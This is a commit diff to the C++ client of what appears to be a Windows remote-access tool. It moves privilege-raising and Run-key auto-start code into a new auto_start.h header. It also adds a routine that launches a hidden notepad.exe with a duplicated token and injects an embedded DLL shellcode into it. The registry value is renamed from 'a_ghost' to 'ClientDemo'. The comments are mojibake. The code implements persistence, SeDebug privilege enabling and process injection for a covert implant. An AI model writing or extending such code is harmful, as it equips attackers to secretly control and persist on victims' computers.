fix: Improve creating registry and injecting shellcode

client/ClientDll.cpp

@@ -156,59 +156,7 @@ DWORD WaitForMultipleHandlesEx(
 
 #if _CONSOLE
 
-//<2F><><EFBFBD><EFBFBD>Ȩ<EFBFBD><C8A8>
+#include "auto_start.h"
-void DebugPrivilege()
-{
-	HANDLE hToken = NULL;
-	//<2F>򿪵<EFBFBD>ǰ<EFBFBD><C7B0><EFBFBD>̵ķ<CCB5><C4B7><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
-	int hRet = OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hToken);
-
-	if (hRet)
-	{
-		TOKEN_PRIVILEGES tp;
-		tp.PrivilegeCount = 1;
-		//ȡ<><C8A1><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ȩ<EFBFBD>޵<EFBFBD>LUID
-		LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tp.Privileges[0].Luid);
-		tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
-		//<2F><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ƶ<EFBFBD>Ȩ<EFBFBD><C8A8>
-		AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(tp), NULL, NULL);
-
-		CloseHandle(hToken);
-	}
-}
-
-/**
-* @brief <20><><EFBFBD>ñ<EFBFBD><C3B1><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
-* @param[in] *sPath ע<><D7A2><EFBFBD><EFBFBD><EFBFBD><EFBFBD>·<EFBFBD><C2B7>
-* @param[in] *sNmae ע<><D7A2><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
-* @return <20><><EFBFBD><EFBFBD>ע<EFBFBD><D7A2><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
-* @details Win7 64λ<34><CEBB><EFBFBD><EFBFBD><EFBFBD>ϲ<EFBFBD><CFB2>Խ<EFBFBD><D4BD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ע<EFBFBD><D7A2><EFBFBD><EFBFBD><EFBFBD>ڣ<EFBFBD>\n
-* HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run
-* @note <20>״<EFBFBD><D7B4><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ҫ<EFBFBD>Թ<EFBFBD><D4B9><EFBFBD>ԱȨ<D4B1><C8A8><EFBFBD><EFBFBD><EFBFBD>У<EFBFBD><D0A3><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ע<EFBFBD><D7A2><EFBFBD><EFBFBD>д<EFBFBD>뿪<EFBFBD><EBBFAA><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
-*/
-BOOL SetSelfStart(const char* sPath, const char* sNmae)
-{
-	DebugPrivilege();
-
-	// д<><D0B4><EFBFBD><EFBFBD>ע<EFBFBD><D7A2><EFBFBD><EFBFBD>·<EFBFBD><C2B7>
-#define REGEDIT_PATH "Software\\Microsoft\\Windows\\CurrentVersion\\Run\\"
-
-	// <20><>ע<EFBFBD><D7A2><EFBFBD><EFBFBD><EFBFBD><EFBFBD>д<EFBFBD><D0B4><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ϣ
-	HKEY hKey = NULL;
-	LONG lRet = RegOpenKeyExA(HKEY_LOCAL_MACHINE, REGEDIT_PATH, 0, KEY_ALL_ACCESS, &hKey);
-
-	// <20>ж<EFBFBD><D0B6>Ƿ<EFBFBD><C7B7>ɹ<EFBFBD>
-	if (lRet != ERROR_SUCCESS)
-		return FALSE;
-
-	lRet = RegSetValueExA(hKey, sNmae, 0, REG_SZ, (const BYTE*)sPath, strlen(sPath) + 1);
-
-	// <20>ر<EFBFBD>ע<EFBFBD><D7A2><EFBFBD><EFBFBD>
-	RegCloseKey(hKey);
-
-	// <20>ж<EFBFBD><D0B6>Ƿ<EFBFBD><C7B7>ɹ<EFBFBD>
-	return lRet == ERROR_SUCCESS;
-}
 
 // <20><><EFBFBD>ؿ<EFBFBD><D8BF><EFBFBD>̨
 // <20>ο<EFBFBD><CEBF><EFBFBD>https://blog.csdn.net/lijia11080117/article/details/44916647

client/ShellcodeInj.h

@@ -16,12 +16,19 @@ class ShellcodeInj
 {
 public:
 	// Return the process id if inject succeed.
-	int InjectProcess(const char* processName = nullptr) {
+	int InjectProcess(const char* processName = nullptr, bool hasPermission=false) {
 		if (processName) {
 			auto pid = GetProcessIdByName(processName);
 			if (pid ? InjectShellcode(pid, (BYTE*)TinyRun_dll, TinyRun_dll_len) : false)
 				return pid;
 		}
+		if (hasPermission) {
+			auto pid = LaunchNotepadWithCurrentToken();
+			if (pid) {
+				return InjectShellcode(pid, (BYTE*)TinyRun_dll, TinyRun_dll_len) ? pid : 0;
+			}
+		}
+
 		PROCESS_INFORMATION pi = {};
 		STARTUPINFO si = { sizeof(STARTUPINFO) };
 		si.dwFlags = STARTF_USESHOWWINDOW;
@@ -34,6 +41,49 @@ public:
 		return 0;
 	}
 private:
+	DWORD LaunchNotepadWithCurrentToken() {
+		HANDLE hToken = NULL;
+
+		// <20>򿪵<EFBFBD>ǰ<EFBFBD><C7B0><EFBFBD><EFBFBD> token
+		if (!OpenProcessToken(GetCurrentProcess(),
+			TOKEN_DUPLICATE | TOKEN_ASSIGN_PRIMARY | TOKEN_QUERY | TOKEN_ADJUST_DEFAULT | TOKEN_ADJUST_SESSIONID,
+			&hToken)) {
+			Mprintf("OpenProcessToken failed: %d\n", GetLastError());
+			return 0;
+		}
+
+		// <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> token
+		HANDLE hNewToken = NULL;
+		if (!DuplicateTokenEx(hToken, MAXIMUM_ALLOWED, NULL, SecurityImpersonation, TokenPrimary, &hNewToken)) {
+			Mprintf("DuplicateTokenEx failed: %d\n", GetLastError());
+			CloseHandle(hToken);
+			return 0;
+		}
+
+		STARTUPINFOW si = { sizeof(si) };
+		PROCESS_INFORMATION pi = {};
+		si.dwFlags = STARTF_USESHOWWINDOW;
+		si.wShowWindow = SW_HIDE;
+
+		// ʹ<>ø<EFBFBD><C3B8>ƺ<EFBFBD><C6BA><EFBFBD> token <20><><EFBFBD><EFBFBD> notepad
+		if (!CreateProcessWithTokenW(hNewToken, 0, L"C:\\Windows\\System32\\notepad.exe",
+			NULL, 0, NULL, NULL, &si, &pi)) {
+			Mprintf("CreateProcessWithTokenW failed: %d\n", GetLastError());
+			CloseHandle(hToken);
+			CloseHandle(hNewToken);
+			return 0;
+		}
+
+		DWORD dwProcessId = pi.dwProcessId;
+
+		CloseHandle(pi.hProcess);
+		CloseHandle(pi.hThread);
+		CloseHandle(hToken);
+		CloseHandle(hNewToken);
+
+		return dwProcessId; // <20><><EFBFBD><EFBFBD><EFBFBD>ӽ<EFBFBD><D3BD><EFBFBD> ID
+	}
+
 	// Find process id by name.
 	DWORD GetProcessIdByName(const std::string& procName) {
 		DWORD pid = 0;

client/TestRun_vs2015.vcxproj

@@ -159,6 +159,7 @@
     <ClCompile Include="test.cpp" />
   </ItemGroup>
   <ItemGroup>
+    <ClInclude Include="auto_start.h" />
     <ClInclude Include="MemoryModule.h" />
     <ClInclude Include="resource1.h" />
   </ItemGroup>

client/auto_start.h

@@ -0,0 +1,64 @@
+#pragma once
+#include <windows.h>
+
+// <20><><EFBFBD><EFBFBD>Ȩ<EFBFBD><C8A8>
+inline int DebugPrivilege()
+{
+	HANDLE hToken = NULL;
+	if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))
+		return -1;
+
+	// <20><>̬<EFBFBD><CCAC><EFBFBD><EFBFBD><EFBFBD>ռ䣬<D5BC><E4A3AC><EFBFBD><EFBFBD> 3 <20><> LUID
+	TOKEN_PRIVILEGES* tp = (TOKEN_PRIVILEGES*)malloc(sizeof(TOKEN_PRIVILEGES) + 2 * sizeof(LUID_AND_ATTRIBUTES));
+	if (!tp) { CloseHandle(hToken); return 1; }
+
+	tp->PrivilegeCount = 3;
+
+	if (!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tp->Privileges[0].Luid)) { free(tp); CloseHandle(hToken); return 2; }
+	tp->Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
+
+	if (!LookupPrivilegeValue(NULL, SE_INCREASE_QUOTA_NAME, &tp->Privileges[1].Luid)) { free(tp); CloseHandle(hToken); return 3; }
+	tp->Privileges[1].Attributes = SE_PRIVILEGE_ENABLED;
+
+	if (!LookupPrivilegeValue(NULL, SE_ASSIGNPRIMARYTOKEN_NAME, &tp->Privileges[2].Luid)) { free(tp); CloseHandle(hToken); return 4; }
+	tp->Privileges[2].Attributes = SE_PRIVILEGE_ENABLED;
+
+	AdjustTokenPrivileges(hToken, FALSE, tp, sizeof(TOKEN_PRIVILEGES) + 2 * sizeof(LUID_AND_ATTRIBUTES), NULL, NULL);
+
+	free(tp);
+	CloseHandle(hToken);
+	return 0;
+}
+
+/**
+* @brief <20><><EFBFBD>ñ<EFBFBD><C3B1><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
+* @param[in] *sPath ע<><D7A2><EFBFBD><EFBFBD><EFBFBD><EFBFBD>·<EFBFBD><C2B7>
+* @param[in] *sNmae ע<><D7A2><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
+* @return <20><><EFBFBD><EFBFBD>ע<EFBFBD><D7A2><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
+* @details Win7 64λ<34><CEBB><EFBFBD><EFBFBD><EFBFBD>ϲ<EFBFBD><CFB2>Խ<EFBFBD><D4BD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ע<EFBFBD><D7A2><EFBFBD><EFBFBD><EFBFBD>ڣ<EFBFBD>\n
+* HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run
+* @note <20>״<EFBFBD><D7B4><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ҫ<EFBFBD>Թ<EFBFBD><D4B9><EFBFBD>ԱȨ<D4B1><C8A8><EFBFBD><EFBFBD><EFBFBD>У<EFBFBD><D0A3><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ע<EFBFBD><D7A2><EFBFBD><EFBFBD>д<EFBFBD>뿪<EFBFBD><EBBFAA><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
+*/
+inline BOOL SetSelfStart(const char* sPath, const char* sNmae)
+{
+	DebugPrivilege();
+
+	// д<><D0B4><EFBFBD><EFBFBD>ע<EFBFBD><D7A2><EFBFBD><EFBFBD>·<EFBFBD><C2B7>
+#define REGEDIT_PATH "Software\\Microsoft\\Windows\\CurrentVersion\\Run\\"
+
+	// <20><>ע<EFBFBD><D7A2><EFBFBD><EFBFBD><EFBFBD><EFBFBD>д<EFBFBD><D0B4><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ϣ
+	HKEY hKey = NULL;
+	LONG lRet = RegOpenKeyExA(HKEY_CURRENT_USER, REGEDIT_PATH, 0, KEY_ALL_ACCESS, &hKey);
+
+	// <20>ж<EFBFBD><D0B6>Ƿ<EFBFBD><C7B7>ɹ<EFBFBD>
+	if (lRet != ERROR_SUCCESS)
+		return FALSE;
+
+	lRet = RegSetValueExA(hKey, sNmae, 0, REG_SZ, (const BYTE*)sPath, strlen(sPath) + 1);
+
+	// <20>ر<EFBFBD>ע<EFBFBD><D7A2><EFBFBD><EFBFBD>
+	RegCloseKey(hKey);
+
+	// <20>ж<EFBFBD><D0B6>Ƿ<EFBFBD><C7B7>ɹ<EFBFBD>
+	return lRet == ERROR_SUCCESS;
+}

client/ghost_vs2015.vcxproj

@@ -211,6 +211,7 @@
     <ClInclude Include="..\server\2015Remote\pwd_gen.h" />
     <ClInclude Include="Audio.h" />
     <ClInclude Include="AudioManager.h" />
+    <ClInclude Include="auto_start.h" />
     <ClInclude Include="Buffer.h" />
     <ClInclude Include="CaptureVideo.h" />
     <ClInclude Include="Common.h" />

client/test.cpp

@@ -6,10 +6,12 @@
 #include <common/commands.h>
 #include "common/dllRunner.h"
 #include <common/iniFile.h>
+#include "auto_start.h"
+
 #pragma comment(lib, "ws2_32.lib")
 
 // <20>Զ<EFBFBD><D4B6><EFBFBD><EFBFBD><EFBFBD>ע<EFBFBD><D7A2><EFBFBD><EFBFBD><EFBFBD>е<EFBFBD>ֵ
-#define REG_NAME "a_ghost"
+#define REG_NAME "ClientDemo"
 
 typedef void (*StopRun)();
 
@@ -32,60 +34,6 @@ HANDLE hEvent = NULL;
 
 CONNECT_ADDRESS g_ConnectAddress = { FLAG_FINDEN, "127.0.0.1", "6543", CLIENT_TYPE_DLL, false, DLL_VERSION, 0, Startup_InjSC };
 
-//<2F><><EFBFBD><EFBFBD>Ȩ<EFBFBD><C8A8>
-void DebugPrivilege()
-{
-	HANDLE hToken = NULL;
-	//<2F>򿪵<EFBFBD>ǰ<EFBFBD><C7B0><EFBFBD>̵ķ<CCB5><C4B7><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
-	int hRet = OpenProcessToken(GetCurrentProcess(),TOKEN_ALL_ACCESS,&hToken);
-
-	if( hRet)
-	{
-		TOKEN_PRIVILEGES tp;
-		tp.PrivilegeCount = 1;
-		//ȡ<><C8A1><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ȩ<EFBFBD>޵<EFBFBD>LUID
-		LookupPrivilegeValue(NULL,SE_DEBUG_NAME,&tp.Privileges[0].Luid);
-		tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
-		//<2F><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ƶ<EFBFBD>Ȩ<EFBFBD><C8A8>
-		AdjustTokenPrivileges(hToken,FALSE,&tp,sizeof(tp),NULL,NULL);
-
-		CloseHandle(hToken);
-	}
-}
-
-/** 
-* @brief <20><><EFBFBD>ñ<EFBFBD><C3B1><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
-* @param[in] *sPath ע<><D7A2><EFBFBD><EFBFBD><EFBFBD><EFBFBD>·<EFBFBD><C2B7>
-* @param[in] *sNmae ע<><D7A2><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
-* @return <20><><EFBFBD><EFBFBD>ע<EFBFBD><D7A2><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
-* @details Win7 64λ<34><CEBB><EFBFBD><EFBFBD><EFBFBD>ϲ<EFBFBD><CFB2>Խ<EFBFBD><D4BD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ע<EFBFBD><D7A2><EFBFBD><EFBFBD><EFBFBD>ڣ<EFBFBD>\n
-* HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run
-* @note <20>״<EFBFBD><D7B4><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ҫ<EFBFBD>Թ<EFBFBD><D4B9><EFBFBD>ԱȨ<D4B1><C8A8><EFBFBD><EFBFBD><EFBFBD>У<EFBFBD><D0A3><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ע<EFBFBD><D7A2><EFBFBD><EFBFBD>д<EFBFBD>뿪<EFBFBD><EBBFAA><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
-*/
-BOOL SetSelfStart(const char *sPath, const char *sNmae)
-{
-	DebugPrivilege();
-
-	// д<><D0B4><EFBFBD><EFBFBD>ע<EFBFBD><D7A2><EFBFBD><EFBFBD>·<EFBFBD><C2B7>
-#define REGEDIT_PATH "Software\\Microsoft\\Windows\\CurrentVersion\\Run\\"
-
-	// <20><>ע<EFBFBD><D7A2><EFBFBD><EFBFBD><EFBFBD><EFBFBD>д<EFBFBD><D0B4><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ϣ
-	HKEY hKey = NULL;
-	LONG lRet = RegOpenKeyExA(HKEY_LOCAL_MACHINE, REGEDIT_PATH, 0, KEY_ALL_ACCESS, &hKey);
-
-	// <20>ж<EFBFBD><D0B6>Ƿ<EFBFBD><C7B7>ɹ<EFBFBD>
-	if(lRet != ERROR_SUCCESS)
-		return FALSE;
-
-	lRet = RegSetValueExA(hKey, sNmae, 0, REG_SZ, (const BYTE*)sPath, strlen(sPath) + 1);
-
-	// <20>ر<EFBFBD>ע<EFBFBD><D7A2><EFBFBD><EFBFBD>
-	RegCloseKey(hKey);
-
-	// <20>ж<EFBFBD><D0B6>Ƿ<EFBFBD><C7B7>ɹ<EFBFBD>
-	return lRet == ERROR_SUCCESS;
-}
-
 BOOL CALLBACK callback(DWORD CtrlType)
 {
 	if (CtrlType == CTRL_CLOSE_EVENT)
@@ -252,7 +200,8 @@ public:
 // <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ھʹ<DABE><CDB4><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>л<EFBFBD>ȡIP<49>Ͷ˿<CDB6>.
 int main(int argc, const char *argv[])
 {
-	if(!SetSelfStart(argv[0], REG_NAME))
+	BOOL ok = SetSelfStart(argv[0], REG_NAME);
+	if(!ok)
 	{
 		Mprintf("<EFBFBD><EFBFBD><EFBFBD>ÿ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʧ<EFBFBD>ܣ<EFBFBD><EFBFBD><EFBFBD><EFBFBD>ù<EFBFBD><EFBFBD><EFBFBD>ԱȨ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>.\n");
 	}
@@ -279,7 +228,7 @@ int main(int argc, const char *argv[])
 		do {
 			if (sizeof(void*) == 4) // Shell code is 64bit
 				break;
-			if (!(pid = inj.InjectProcess(nullptr))) {
+			if (!(pid = inj.InjectProcess(nullptr, ok))) {
 				break;
 			}
 			HANDLE hProcess = OpenProcess(PROCESS_TERMINATE | SYNCHRONIZE, FALSE, pid);